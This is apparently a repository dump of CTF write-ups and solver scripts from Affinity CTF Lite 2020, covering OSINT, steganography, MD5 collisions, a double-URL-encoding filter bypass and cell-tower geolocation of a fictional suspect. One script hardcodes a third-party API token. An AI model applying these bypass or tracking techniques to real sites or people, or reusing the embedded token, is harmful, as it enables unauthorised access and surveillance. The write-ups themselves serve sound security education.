https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Magic Word/nops.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Malicious File/README.md:
--------------------------------------------------------------------------------
1 | # Malicious File
2 |
3 | **Category: Osint** \
4 | **Points: 30**
5 |
6 | ## Desciption
7 |
8 | We detected the following malicious file in our network, we weren’t able to find any issues with it, can you find something?
9 |
10 | ## Challenge
11 |
12 | - Given malware hash
13 | - Find The Flag
14 |
15 | ## Solution
16 |
17 | We were give a text file:
18 | 1. [malware](https://github.com/Red-Knights-CTF/writeups/blob/master/2020/affinity_ctf_lite/Malicious%20File/malware)
19 |
20 | We were given a `SHA-256` hash `88b35a9365e5cd2b32c03832d2c8c02a41e3cead40e49af02cf74a73bfa0dc8d` of a file. As mentioned in discription, it is a malware. The first website that pops to mind thinking about malwares is https://virustotal.com
21 |
22 | Paste your hash in the `Search` tab
23 |
24 | 
25 |
26 | Result let us know that file is not a malware but the `Community` tab have something for us
27 |
28 | 
29 |
30 | Someone has left a url `https://pastebin.com/QqhzEFjK`. Going there will give u a `base64` string `QUZGQ1RGe2ZvbGxvd190aGVfYnJlYWRjcnVtYnN9`, Decode it.
31 |
32 | 
33 |
34 | FLAG - AFFCTF{follow_the_breadcrumbs}
35 |
36 |
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Malicious File/base64.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Malicious File/base64.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Malicious File/community.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Malicious File/community.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Malicious File/malware:
--------------------------------------------------------------------------------
1 | (88b35a9365e5cd2b32c03832d2c8c02a41e3cead40e49af02cf74a73bfa0dc8d)
2 |
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Malicious File/virustotal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Malicious File/virustotal.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/NotRandomCMS/CMS.7z:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/NotRandomCMS/CMS.7z
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/NotRandomCMS/README.md:
--------------------------------------------------------------------------------
1 | # NotRandomCMS
2 |
3 | **Category**: OSINT \
4 | **Point**: 129
5 |
6 | Unzipping the file reveals a PHP web app. Since this is an OSINT problem, I
7 | just seached "NotRandomCMS" on GitHub first, which takes us
8 | [here](https://github.com/notrandomcms/notrandomcmsv1). Looking at the commit
9 | history, we see
10 | [this commit](https://github.com/notrandomcms/notrandomcmsv1/commit/6cdec47e7b78394095de5c8856fd67e2a9b6410c)
11 | called "Remove secret files". Looking at
12 | [config/web.php](https://github.com/notrandomcms/notrandomcmsv1/blob/bc757ed02ff3927ab7ce0298be1099a4ca81dbe0/config/web.php)
13 | from this commit, we see:
14 | ```
15 | // !!! insert a secret key in the following (if it is empty) - this is required by cookie validation
16 | 'cookieValidationKey' => 'AFFCTF{thisShouldBeASecret!}',
17 | ```
18 |
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/One is missing/README.md:
--------------------------------------------------------------------------------
1 | # One is missing
2 |
3 | **Category**: Steg \
4 | **Points**: 10
5 |
6 | 
7 |
8 | In the given picture. you'll see a cutes, if you used strings on the file you'll see the flag in the end.
9 |
10 | 
11 |
12 | the flag is `AFFCTF{HIDDENKITTEN}`
13 |
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/One is missing/full_of__cuteness.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/One is missing/full_of__cuteness.jpg
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/One is missing/strings.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/One is missing/strings.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path of Double-Dipping/README.md:
--------------------------------------------------------------------------------
1 | # Path of Double-Dipping
2 |
3 | **Category**: Web \
4 | **Points**: 85
5 |
6 | Opening the given link: `http://web3.affinityctf.com` gives us the Challange name and description,
7 | 
8 | Basically From the description you'll see the author gives u a directory.
9 | and You'll see Double word in the Name
10 | first thing to came your mind it's URL DOUBLE "ENCODING" the lost word
11 | i'll use this website for double encoding https://www.url-encode-decode.com/
12 | and encode the given dir twice,
13 | 
14 | and put it into the url like this,and will get the flag.
15 | 
16 |
17 | The flag is `AFFCTF{1s7r1pl3D1p83tt3r?}`
18 |
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path of Double-Dipping/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Path of Double-Dipping/flag.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path of Double-Dipping/ndc.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Path of Double-Dipping/ndc.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path of Double-Dipping/urltwice.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Path of Double-Dipping/urltwice.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/Figure_1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Path_of_the_suspect/Figure_1.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/archive/Figure_1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Path_of_the_suspect/archive/Figure_1.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/archive/gpsvis:
--------------------------------------------------------------------------------
1 | 49.91982,19.894857
2 | 50.019426,19.891884
3 | 50.035515,19.89006
4 | 50.08049,19.876327
5 | 49.991798,19.887314
6 | 49.91908,20.191554
7 | 49.973381,20.189938
8 | 50.080490112305,20.189437866211
9 | 50.092027,20.287366
10 | 50.105564,20.392029
11 | 50.003518,20.428104
12 | 49.934921264648,20.407791137695
13 | 49.921188354492,20.30891418457
14 | 50.10383605957,20.627517700195
15 | 50.107296,20.671112
16 | 50.102462768555,20.762100219727
17 | 50.070877075195,20.719528198242
18 | 50.022984,20.721794
19 | 50.004959106445,20.723648071289
20 | 49.968061,20.726086
21 | 50.115638,20.972863
22 | 50.064011,20.979355
23 | 50.020918,20.977612
24 | 49.948654174805,20.985946655273
25 | 49.958267211914,21.038131713867
26 | 49.957581,21.122589
27 | 50.145034790039,21.448745727539
28 | 50.066816,21.438063
29 | 49.998092651367,21.46110534668
30 | 49.99466,21.56479
31 |
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/archive/main.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import pprint
3 | import json
4 |
5 | url = "https://us1.unwiredlabs.com/v2/process.php"
6 | token = "pk.62bce8462ad93af8bb529310a573e935"
7 |
8 | # payload = {
9 | # "token": "pk.62bce8462ad93af8bb529310a573e935",
10 | # "radio": "gsm",
11 | # "mcc": 260,
12 | # "mnc": 3,
13 | # "cells": [{
14 | # "lac": 52911,
15 | # "cid": 8961
16 | # }],
17 | # "address": 1
18 | # }
19 |
20 | with open('src.json', 'r') as f:
21 | src = json.load(f)
22 |
23 | locs = []
24 |
25 | for cell in src:
26 | payload = {
27 | 'token': token,
28 | 'radio': cell['rtype'],
29 | 'mcc': cell['mcc'],
30 | 'mnc': cell['mnc'],
31 | 'cells': [{
32 | 'lac': cell['lac'],
33 | 'cid': cell['cid']
34 | }],
35 | 'address': 1
36 | }
37 |
38 | response = requests.request('POST', url, json=payload)
39 | print("Received loc")
40 | locs.append(response.json())
41 |
42 | with open('locs.json', 'w') as f:
43 | f.write(json.dumps(locs, indent=4))
44 |
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/archive/main1.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import pprint
3 | import json
4 | import time
5 |
6 | # https://www.opencellid.org/ajax/searchCell.php?mcc=260&mnc=3&lac=52911&cell_id=8961
7 |
8 | url = 'https://www.opencellid.org/ajax/searchCell.php'
9 |
10 | with open('src.json', 'r') as f:
11 | src = json.load(f)
12 |
13 | locs = []
14 |
15 | for cell in src:
16 | payload = {
17 | 'mcc': cell['mcc'],
18 | 'mnc': cell['mnc'],
19 | 'lac': cell['lac'],
20 | 'cell_id': cell['cid']
21 | }
22 |
23 | response = requests.request('GET', url, params=payload)
24 | print("Received loc: ", response.json())
25 | locs.append(response.json())
26 | time.sleep(5)
27 |
28 | with open('locs1.json', 'w') as f:
29 | f.write(json.dumps(locs, indent=4))
30 |
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/archive/manual_locs.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Path_of_the_suspect/archive/manual_locs.txt
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/archive/mapcust.txt:
--------------------------------------------------------------------------------
1 | 49.914465, 19.877101
2 | 50.024016, 19.895086
3 | 50.034693, 19.895183
4 | 50.079678, 19.88198
5 | 49.989998, 19.876482
6 |
7 | 49.923973, 20.189116
8 | 49.96871, 20.113321
9 | 50.026811, 20.216598
10 | 50.104272, 20.32828
11 | 49.897114, 20.427753
12 | 50.00397, 20.4294
13 | 50.317753, 20.579615
14 | 49.923744, 20.268881
15 |
16 | 50.133148, 20.452311
17 | 50.102283, 20.697435
18 | 50.076893, 20.860228
19 | 49.835632, 20.42345
20 | 50.026696, 20.733899
21 | 49.989895, 20.625072
22 | 49.967453, 20.701647
23 |
24 | 50.109528, 21.01312
25 | 50.062041, 20.978484
26 | 50.02284, 20.966575
27 | 50.001915, 20.978219
28 | 49.950378, 21.010592
29 | 49.965761, 21.119996
30 |
31 | 50.128447, 21.424166
32 | 50.077454, 21.424437
33 | 50.090305, 21.297522
34 | 49.977055, 21.552629
35 |
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/archive/notes.md:
--------------------------------------------------------------------------------
1 | 5
2 | 8
3 | 7
4 | 6
5 | 4
6 |
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/archive/notes.txt:
--------------------------------------------------------------------------------
1 | IX3CY
2 | IOTLL
3 |
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/archive/parse.py:
--------------------------------------------------------------------------------
1 | import pprint
2 | import json
3 |
4 |
5 | with open('src.txt', 'r') as f:
6 | fstr = f.read()
7 |
8 | ss = fstr.splitlines()
9 | locs = []
10 | line_i = 0
11 | while line_i < len(ss):
12 | print(ss[line_i])
13 | line_i += 1 # Registered at
14 | dates = ss[line_i].split()
15 | line_i += 1
16 | days = dates[0::2]
17 | times = dates[1::2]
18 |
19 | mccs = ss[line_i].split()
20 | line_i += 1
21 | mccs = mccs[1::2]
22 | mccs = [int(x) for x in mccs]
23 |
24 | mncs = ss[line_i].split()
25 | line_i += 1
26 | mncs = mncs[1::2]
27 | mncs = [int(x) for x in mncs]
28 |
29 | lacs = ss[line_i].split()
30 | line_i += 1
31 | lacs = lacs[1::2]
32 | lacs = [int(x) for x in lacs]
33 |
34 | cids = ss[line_i].split()
35 | line_i += 1
36 | cids = cids[1::2]
37 | cids = [int(x) for x in cids]
38 |
39 | rtypes = ss[line_i].split()
40 | line_i += 1
41 | rtypes = rtypes[2::3]
42 |
43 | for i in range(len(days)):
44 | loc = {}
45 | loc['day'] = days[i]
46 | loc['time'] = times[i]
47 | loc['mcc'] = mccs[i]
48 | loc['mnc'] = mncs[i]
49 | loc['lac'] = lacs[i]
50 | loc['cid'] = cids[i]
51 | loc['rtype'] = rtypes[i]
52 | locs.append(loc)
53 |
54 | pprint.pprint(locs)
55 |
56 | with open('src.json', 'w') as f:
57 | f.write(json.dumps(locs, indent=4))
58 |
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/archive/proc.py:
--------------------------------------------------------------------------------
1 | import json
2 |
3 | with open('src.json', 'r') as f:
4 | src = json.load(f)
5 |
6 | with open('locs.json', 'r') as f:
7 | locs = json.load(f)
8 |
9 | print(len(src))
10 | print(len(locs))
11 |
12 | with open('mapcust.txt', 'w') as f:
13 | for loc in locs:
14 | f.write("{}, {}\n".format(loc['lat'], loc['lon']))
15 |
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/archive/proc1.py:
--------------------------------------------------------------------------------
1 | import json
2 | import matplotlib.pyplot as plt
3 |
4 | with open('src.json', 'r') as f:
5 | src = json.load(f)
6 |
7 | with open('locs.json', 'r') as f:
8 | locs = json.load(f)
9 |
10 | print(len(src))
11 | print(len(locs))
12 |
13 | groups = [5, 8, 7, 6, 4]
14 | gi = 0
15 | i = 0
16 | while i < len(locs):
17 | group = locs[i: i + groups[gi]]
18 | lats = []
19 | lons = []
20 | for x in group:
21 | lats.append(x['lat'])
22 | lons.append(x['lon'])
23 |
24 | print(lats)
25 | print(lons)
26 | plt.plot(lons, lats, marker='o')
27 |
28 | i += groups[gi]
29 | gi += 1
30 |
31 | # lats = []
32 | # lons = []
33 | # for loc in locs:
34 | # lats.append(loc['lat'])
35 | # lons.append(loc['lon'])
36 |
37 | # plt.plot(lons, lats, marker='o')
38 |
39 | plt.show()
40 |
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/archive/proc2.py:
--------------------------------------------------------------------------------
1 | import json
2 | import matplotlib.pyplot as plt
3 |
4 | with open('src.json', 'r') as f:
5 | src = json.load(f)
6 |
7 | with open('locs1.json', 'r') as f:
8 | locs = json.load(f)
9 |
10 | print(len(src))
11 | print(len(locs))
12 |
13 | # groups = [5, 8, 7, 6, 4]
14 | # gi = 0
15 | # i = 0
16 | # while i < len(locs):
17 | # group = locs[i: i + groups[gi]]
18 | # lats = []
19 | # lons = []
20 | # for x in group:
21 | # lats.append(x['lat'])
22 | # lons.append(x['lon'])
23 |
24 | # print(lats)
25 | # print(lons)
26 | # plt.plot(lons, lats, marker='o')
27 |
28 | # i += groups[gi]
29 | # gi += 1
30 |
31 | lats = []
32 | lons = []
33 | for loc in locs:
34 | lats.append(loc['lat'])
35 | lons.append(loc['lon'])
36 |
37 | plt.plot(lons, lats, marker='o')
38 |
39 | plt.show()
40 |
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/archive/proc3.py:
--------------------------------------------------------------------------------
1 | import json
2 | import matplotlib.pyplot as plt
3 |
4 | with open('src.json', 'r') as f:
5 | src = json.load(f)
6 |
7 | with open('locs1.json', 'r') as f:
8 | locs = json.load(f)
9 |
10 | print(len(src))
11 | print(len(locs))
12 |
13 | # groups = [5, 8, 7, 6, 4]
14 | # gi = 0
15 | # i = 0
16 | # while i < len(locs):
17 | # group = locs[i: i + groups[gi]]
18 | # lats = []
19 | # lons = []
20 | # for x in group:
21 | # lats.append(x['lat'])
22 | # lons.append(x['lon'])
23 |
24 | # print(lats)
25 | # print(lons)
26 | # plt.plot(lons, lats, marker='o')
27 |
28 | # i += groups[gi]
29 | # gi += 1
30 |
31 | with open('gpsvis', 'w') as f:
32 | for loc in locs:
33 | f.write("{},{}\n".format(loc['lat'], loc['lon']))
34 |
35 | # plt.plot(lons, lats, marker='o')
36 |
37 | # plt.show()
38 |
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/main.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import pprint
3 | import json
4 | import time
5 |
6 | # https://www.opencellid.org/ajax/searchCell.php?mcc=260&mnc=3&lac=52911&cell_id=8961
7 |
8 | url = 'https://www.opencellid.org/ajax/searchCell.php'
9 |
10 | with open('src.json', 'r') as f:
11 | src = json.load(f)
12 |
13 | locs = []
14 |
15 | for cell in src:
16 | payload = {
17 | 'mcc': cell['mcc'],
18 | 'mnc': cell['mnc'],
19 | 'lac': cell['lac'],
20 | 'cell_id': cell['cid']
21 | }
22 |
23 | response = requests.request('GET', url, params=payload)
24 | print("Received loc: ", response.json())
25 | locs.append(response.json())
26 | time.sleep(5)
27 |
28 | with open('locs1.json', 'w') as f:
29 | f.write(json.dumps(locs, indent=4))
30 |
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/map.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Path_of_the_suspect/map.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/mapconv:
--------------------------------------------------------------------------------
1 | 49.91982,19.894857
2 | 50.019426,19.891884
3 | 50.035515,19.89006
4 | 50.08049,19.876327
5 | 49.991798,19.887314
6 | 49.91908,20.191554
7 | 49.973381,20.189938
8 | 50.080490112305,20.189437866211
9 | 50.092027,20.287366
10 | 50.105564,20.392029
11 | 50.003518,20.428104
12 | 49.934921264648,20.407791137695
13 | 49.921188354492,20.30891418457
14 | 50.10383605957,20.627517700195
15 | 50.107296,20.671112
16 | 50.102462768555,20.762100219727
17 | 50.070877075195,20.719528198242
18 | 50.022984,20.721794
19 | 50.004959106445,20.723648071289
20 | 49.968061,20.726086
21 | 50.115638,20.972863
22 | 50.064011,20.979355
23 | 50.020918,20.977612
24 | 49.948654174805,20.985946655273
25 | 49.958267211914,21.038131713867
26 | 49.957581,21.122589
27 | 50.145034790039,21.448745727539
28 | 50.066816,21.438063
29 | 49.998092651367,21.46110534668
30 | 49.99466,21.56479
31 |
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/parse.py:
--------------------------------------------------------------------------------
1 | import pprint
2 | import json
3 |
4 |
5 | with open('src.txt', 'r') as f:
6 | fstr = f.read()
7 |
8 | ss = fstr.splitlines()
9 | locs = []
10 | line_i = 0
11 | while line_i < len(ss):
12 | print(ss[line_i])
13 | line_i += 1 # Registered at
14 | dates = ss[line_i].split()
15 | line_i += 1
16 | days = dates[0::2]
17 | times = dates[1::2]
18 |
19 | mccs = ss[line_i].split()
20 | line_i += 1
21 | mccs = mccs[1::2]
22 | mccs = [int(x) for x in mccs]
23 |
24 | mncs = ss[line_i].split()
25 | line_i += 1
26 | mncs = mncs[1::2]
27 | mncs = [int(x) for x in mncs]
28 |
29 | lacs = ss[line_i].split()
30 | line_i += 1
31 | lacs = lacs[1::2]
32 | lacs = [int(x) for x in lacs]
33 |
34 | cids = ss[line_i].split()
35 | line_i += 1
36 | cids = cids[1::2]
37 | cids = [int(x) for x in cids]
38 |
39 | rtypes = ss[line_i].split()
40 | line_i += 1
41 | rtypes = rtypes[2::3]
42 |
43 | for i in range(len(days)):
44 | loc = {}
45 | loc['day'] = days[i]
46 | loc['time'] = times[i]
47 | loc['mcc'] = mccs[i]
48 | loc['mnc'] = mncs[i]
49 | loc['lac'] = lacs[i]
50 | loc['cid'] = cids[i]
51 | loc['rtype'] = rtypes[i]
52 | locs.append(loc)
53 |
54 | pprint.pprint(locs)
55 |
56 | with open('src.json', 'w') as f:
57 | f.write(json.dumps(locs, indent=4))
58 |
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/proc.py:
--------------------------------------------------------------------------------
1 | import json
2 | import matplotlib.pyplot as plt
3 |
4 | with open('locs.json', 'r') as f:
5 | locs = json.load(f)
6 |
7 | with open('mapconv', 'w') as f:
8 | for loc in locs:
9 | f.write("{},{}\n".format(loc['lat'], loc['lon']))
10 |
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Path_of_the_suspect/suspect_BTS_registration_log.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Path_of_the_suspect/suspect_BTS_registration_log.pdf
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/README.md:
--------------------------------------------------------------------------------
1 | # Affinity CTF Lite 2020
2 |
3 | **Site**: http://affinityctf.com/
4 |
5 | **Rank**: 5 / 689
6 |
7 | 
8 |
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Shark has a long tail/CyberChef.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Shark has a long tail/CyberChef.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Shark has a long tail/SharkHasALongTail.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Shark has a long tail/SharkHasALongTail.pcap
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Shark has a long tail/wire_shark.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Shark has a long tail/wire_shark.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Wholeisbetter/There_is_a_flag_somewhere.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Wholeisbetter/There_is_a_flag_somewhere.pdf
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/collision_course/README.md:
--------------------------------------------------------------------------------
1 | # Collision course
2 |
3 | **Category**: Cryptography \
4 | **Points**: 500
5 |
6 | ## Challenge
7 | - Create 2 DIFFERENT files with the same md5 hash.
8 | - Additionally, the files have to contain the phrase: "AFFCTF".
9 | - File size limit is is 100000b
10 |
11 | ## Solution
12 |
13 | Grab two 4.0KB example files with an md5 collision:
14 | 1. [collision1.zip](https://github.com/corkami/collisions/blob/master/examples/collision1.zip)
15 | 2. [collision2.zip](https://github.com/corkami/collisions/blob/master/examples/collision2.zip)
16 |
17 | Append `AFFCTF` to both.
18 | ```
19 | $ md5sum collision1.zip collision2.zip
20 | 2b980a3708ff9edfdd6c8dfbb42e4f8d collision1.zip
21 | 2b980a3708ff9edfdd6c8dfbb42e4f8d collision2.zip
22 |
23 | $ echo "AFFCTF" >> collision1.zip
24 | $ echo "AFFCTF" >> collision2.zip
25 |
26 | $ md5sum collision1.zip collision2.zip
27 | f6ff7f5a9c9dfcb3715d05bde1e6f708 collision1.zip
28 | f6ff7f5a9c9dfcb3715d05bde1e6f708 collision2.zip
29 | ```
30 |
31 | Submitting this to the challenge page, I got:
32 | ```
33 | Checking, please wait...
34 | String found in the first file
35 | String found in the second file
36 | Checking if files are different...
37 | Files are different
38 | Checking if files are MD5 Hash is the same for both files...
39 | MD5Hashes are the same. You were right. The flag is: AFFCTF{One_Way_Or_Another}
40 | ```
41 |
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/collision_course/collision1.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/collision_course/collision1.zip
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/collision_course/collision2.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/collision_course/collision2.zip
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/dias skeerG tneicna/decode.me:
--------------------------------------------------------------------------------
1 | 554545532245{22434223_4223_42212322_55_234234313551_34553131423344}
2 |
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/operationsluggishhamster/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/operationsluggishhamster/flag.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/operationsluggishhamster/ostrichflag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/operationsluggishhamster/ostrichflag.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/operationsluggishhamster/pubkey.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/operationsluggishhamster/pubkey.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/operationsluggishhamster/sherlock.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/operationsluggishhamster/sherlock.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/operationsluggishhamster/wayback.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/operationsluggishhamster/wayback.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/operationsluggishhamster/wp1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/operationsluggishhamster/wp1.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/pseudo-pseudo-random/README.md:
--------------------------------------------------------------------------------
1 | # Writeup : pseudo-pseudo-random
2 |
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/rank.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/rank.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/sooodefault/README.md:
--------------------------------------------------------------------------------
1 | # sooodefault
2 |
3 | **Category**: Web \
4 | **Points**: 30
5 |
6 | Opening the given link: `http://web2.affinityctf.com/` gives us a Apache2 Ubuntu
7 | Default Page.
8 | If we compare the page with any Apache2 Default page, will notice there HTML
9 | entites. Decoding this will give us the flag but I wrote a quick script for
10 | to collect and decode it :D
11 | ```python
12 | import requests
13 | import re
14 | r=requests.session()
15 | url="http://web2.affinityctf.com/"
16 | op=r.get(url)
17 | op=re.findall("[0-9]{2,3}",op.text)
18 | print(op)
19 | print(''.join([chr(int(i.replace("",""))) for i in op]))
20 | ```
21 | 
22 |
23 | The flag is `AFFCTF{htmlentity}`
24 |
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/sooodefault/script.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/sooodefault/script.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/true-content/images/before-redirect.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/true-content/images/before-redirect.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/true-content/images/construction.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/true-content/images/construction.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/true-content/images/solve.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/true-content/images/solve.png
--------------------------------------------------------------------------------
/2020/asis_ctf/README.md:
--------------------------------------------------------------------------------
1 | # Asis CTF 2020
2 |
3 | **Site** : https://asisctf.com
4 |
5 | **Rank** : 64/351
6 |
7 | 
8 |
9 |
10 |
11 |
12 |
13 |
--------------------------------------------------------------------------------
/2020/asis_ctf/asis.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/asis_ctf/asis.png
--------------------------------------------------------------------------------
/2020/dragon_ctf/README.md:
